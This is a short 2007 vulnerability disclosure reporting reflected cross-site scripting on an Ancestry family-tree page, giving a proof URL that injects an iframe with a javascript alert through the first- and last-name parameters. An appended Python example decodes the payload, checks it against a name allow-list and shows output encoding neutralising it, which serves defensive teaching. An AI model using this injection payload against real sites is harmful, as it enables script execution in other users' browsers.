
ancestry-xss.txt

Posted on 21 December 2007

# Title : Ancestry XSS vuln
# Description : The Ancestry site is vulnerable to XSS
# Author : Tosser
# E-mail : ht7015@gmail.com
# Proof : http://trees.ancestry.com/pt/StartPed.aspx?URL=pt%2fStartPed.aspx&fn=%3ciframe+src%3d%22javascript%3aalert('XSS')%22%3e&ln=%3c%2fiframe%3e&gen=M&o_iid=30263&o_lid=30263&offerid=0%3a7858%3a0
or go to http://www.ancestry.com/ and enter the XSS code in the "Your First Name" and "Your Last Name" fields.
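The proof URL reflects the `fn` and `ln` parameters into the page without encoding, with the markup split across the two fields. The following is an added example, not part of the original advisory and not the site's code: it decodes those two parameters from the proof URL, checks them against an assumed name allow-list, and shows that HTML-encoding on output renders them inert. The page fragment in `render_name` and the `NAME_RE` policy are hypothetical.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Proof URL copied unchanged from the advisory.
POC_URL = (
    "http://trees.ancestry.com/pt/StartPed.aspx?URL=pt%2fStartPed.aspx"
    "&fn=%3ciframe+src%3d%22javascript%3aalert('XSS')%22%3e"
    "&ln=%3c%2fiframe%3e&gen=M&o_iid=30263&o_lid=30263&offerid=0%3a7858%3a0"
)
NAME_FIELDS = ("fn", "ln")  # first-name and last-name parameters in the proof URL

# Assumed input policy for a personal name: starts with a letter, then letters,
# spaces, periods, apostrophes or hyphens, 64 characters at most.
NAME_RE = re.compile(r"[^\W\d_](?:[^\W\d_]|[ .'\-]){0,63}")


def name_params(url):
    """Return the URL-decoded fn/ln values exactly as the server would see them."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: query.get(key, [""])[0] for key in NAME_FIELDS}


def is_plausible_name(value):
    """Input validation: reject anything that does not look like a name."""
    return NAME_RE.fullmatch(value) is not None


def render_name(fn, ln, encode=True):
    """Hypothetical page fragment that echoes the two fields back.

    encode=False reproduces the reflected behaviour the advisory reports;
    encode=True applies HTML entity encoding at the point of output.
    """
    if encode:
        fn, ln = html.escape(fn, quote=True), html.escape(ln, quote=True)
    return f'<span class="person">{fn} {ln}</span>'


if __name__ == "__main__":
    params = name_params(POC_URL)
    for key, value in params.items():
        print(f"{key}: {value!r} plausible_name={is_plausible_name(value)}")
    print("unencoded:", render_name(params["fn"], params["ln"], encode=False))
    print("encoded:  ", render_name(params["fn"], params["ln"], encode=True))
```

Output encoding is the control that closes the hole; the allow-list is a second layer that also catches the payload being split across both fields, since each half fails validation on its own.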
